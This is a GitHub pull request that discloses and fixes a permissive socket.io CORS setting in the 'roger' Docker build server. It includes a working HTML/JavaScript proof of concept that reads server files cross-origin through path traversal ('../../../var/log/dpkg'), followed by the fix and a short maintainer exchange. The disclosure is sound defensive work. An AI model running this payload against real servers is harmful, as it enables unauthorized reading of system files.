search

namshi / roger

A continuous integration and build server for Docker containers
127 stars 26 forks source link

[Security] Fix unsafe CORS configuration #49

Closed nadirrrr closed 6 years ago

nadirrrr commented 6 years ago

CORS enabled by default on socket.io server, allowing cross origin requests

The CORS configuration is enabled by default by socket.io, and roger hasn't set the configuration, therefore socket.io will respond to requests from other origins with the Access-Control-Allow-Credentials and Access-Control-Allow-Origin on any request. This will allow an attacker to make cross-origin requests to the socket.io server, as every origin is allowed.

The CORS misconfiguration could be fruther escalated due to a path traversal vulnerability. This would allow an attacker to:

The attacker requires the following from the victim:

Proof of Concept

<script src="https://cdnjs.cloudflare.com/ajax/libs/socket.io/2.1.0/socket.io.js" type="text/javascript"></script>
<script src="https://cdnjs.cloudflare.com/ajax/libs/socket.io-stream/0.9.1/socket.io-stream.js"></script>
<script type="text/javascript">
            // The roger instance host, for me it was localhost:8082, and I was running the host from a different origin
            var socket = io.connect('http://localhost:8082');

            var stream = ss.createStream();

            // Emit get-build-log, supply stream and buildId, where a path traversal vulnerability was found.
            ss(socket).emit('get-build-log', stream, {buildId: "../../../var/log/dpkg"});

            stream.on('data', function(chunk) {

                // print chunks of data in console.log

                console.log(chunk.toString());

            });

</script>

My first thought was that the socket.io server wasn't used anymore, but apparently it is still required. I have set socket.io to only accept the origin specified in the configuration file at app.url. This should fix the issue and disallow any other origins to interact with the socket.io server.

I have removed the get-build-log event as it's not required anymore. The functionality was removed on the client side in #33.

I have used https://socket.io/docs/server-api/#server-origins-fn.

odino commented 6 years ago

@nadirio I see we removed the 'get-build-log' endpoint for socket.io, are you sure build streaming still works with this removed?

nadirrrr commented 6 years ago

Hi @odino! Yes I did. And I am sure. As we can see here https://github.com/namshi/roger/pull/33/commits/b5381efc9dad30d4c534fe08536a3e3317461af6#diff-8b7ac49cbb975e91e103ff6dad18ec2cL36 and https://github.com/namshi/roger/pull/33/commits/b5381efc9dad30d4c534fe08536a3e3317461af6#diff-8b7ac49cbb975e91e103ff6dad18ec2cL4, socket.io-stream was removed on the client side, meaning we do not require the event anymore.

odino commented 6 years ago

Thanks a bunch!